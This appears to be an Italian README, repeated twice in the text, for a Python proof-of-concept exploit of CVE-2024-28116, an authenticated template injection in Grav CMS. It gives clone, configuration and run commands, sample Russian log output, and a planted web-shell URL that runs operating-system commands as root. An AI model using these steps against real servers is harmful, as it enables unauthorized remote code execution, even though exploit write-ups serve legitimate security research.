
è uno script Python PoC che sfrutta una vulnerabilità di Server-Side Template Injection (SSTI) che richiede autenticazione in Grav CMS versioni <= 1.7.44 (CVE-2024-28116)
GenGravSSTIExploit è uno script PoC in Python che sfrutta una vulnerabilità di Server-Side Template Injection (SSTI) autenticata nelle versioni di Grav CMS <= 1.7.44 (CVE-2024-28116). Questa vulnerabilità consente a un utente con permessi di editor di eseguire comandi del sistema operativo su un server remoto.
Nota: questo script richiede credenziali valide per autenticarsi nella console di Grav CMS.
requests (installabile con pip install requests)Clona il repository
git clone https://github.com/geniuszly/GenGravSSTIExploit
cd GenGravSSTIExploit
Configura le credenziali
Modifica lo script per inserire le tue credenziali di editor di Grav CMS:
GRAV_USER = "youruser"
GRAV_PASSWORD = "yourpassword"
Esegui lo script
Usa il seguente comando per eseguire lo script:
python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
<TARGET_URL>: URL target nel formato http[s]://hostname.<PORT>: numero di porta (predefinito: 80).Esempio:
python GenGravSSTIExploit.py -t http://example.com -p 8080
Interagisci con l'exploit
Se l'exploit ha successo, riceverai un URL su cui potrai eseguire comandi del sistema operativo:
[+] RCE payload injected. Visit the malicious page: http://example.com:8080/poc_<ID>?do=<command>
python GenGravSSTIExploit.py -t http://example.com -p 8080
Lo script eseguirà ogni passaggio, fornendoti aggiornamenti tramite il terminale. Ecco cosa potresti vedere:
2024-10-02 12:00:01 - INFO - Проверка целевого URL...
2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
2024-10-02 12:00:05 - INFO - Создание новой страницы...
2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>
Al termine dello script, vedrai un messaggio con il link alla pagina iniettata. Puoi visitare questo link per eseguire comandi del sistema operativo
http://example.com:8080/poc_4T7B?do=whoami
Visitando l'URL con il comando specificato, l'output verrà mostrato direttamente sulla pagina:
Cmd-Output:
root
Questo strumento è destinato esclusivamente a scopi educativi. Usalo in modo responsabile e solo su sistemi per cui hai esplicita autorizzazione. L'autore non è responsabile per eventuali usi impropri o danni causati da questo script.
GenGravSSTIExploit è uno script PoC in Python che sfrutta una vulnerabilità SSTI (Server-Side Template Injection) autenticata nelle versioni di Grav CMS <= 1.7.44 (CVE-2024-28116). Questa vulnerabilità consente a un utente con permessi di editor di eseguire comandi del sistema operativo su un server remoto.
Nota: lo script richiede credenziali valide per l'autenticazione nel pannello di amministrazione di Grav CMS.
requests (installabile con pip install requests)Clona il repository
git clone https://github.com/geniuszly/GenGravSSTIExploit
cd GenGravSSTIExploit
Configura le credenziali
Modifica lo script e inserisci le credenziali di editor di Grav CMS:
GRAV_USER = "youruser"
GRAV_PASSWORD = "yourpassword"
Esegui lo script
Usa il seguente comando per eseguire lo script:
python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
<TARGET_URL>: URL target nel formato http[s]://hostname.<PORT>: numero di porta (predefinito: 80).Esempio:
python GenGravSSTIExploit.py -t http://example.com -p 8080
Interagisci con l'exploit
Se l'exploit ha successo, riceverai un URL dove potrai eseguire comandi del sistema operativo:
[+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_<ID>?do=<command>
python GenGravSSTIExploit.py -t http://example.com -p 8080
Lo script eseguirà ogni passaggio, fornendoti aggiornamenti tramite il terminale. Ecco cosa potresti vedere:
2024-10-02 12:00:01 - INFO - Проверка целевого URL...
2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
2024-10-02 12:00:05 - INFO - Создание новой страницы...
2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>
Al termine dell'esecuzione dello script, vedrai un messaggio con il link alla pagina iniettata. Puoi visitare questo link per eseguire i comandi:
http://example.com:8080/poc_4T7B?do=whoami
Visitando l'URL con il comando specificato, l'output verrà visualizzato direttamente sulla pagina:
Cmd-Output:
root
Questo strumento è destinato esclusivamente a scopi educativi. Usalo in modo responsabile e solo su sistemi per cui hai un'autorizzazione esplicita. L'autore non è responsabile per eventuali abusi o danni causati da questo script.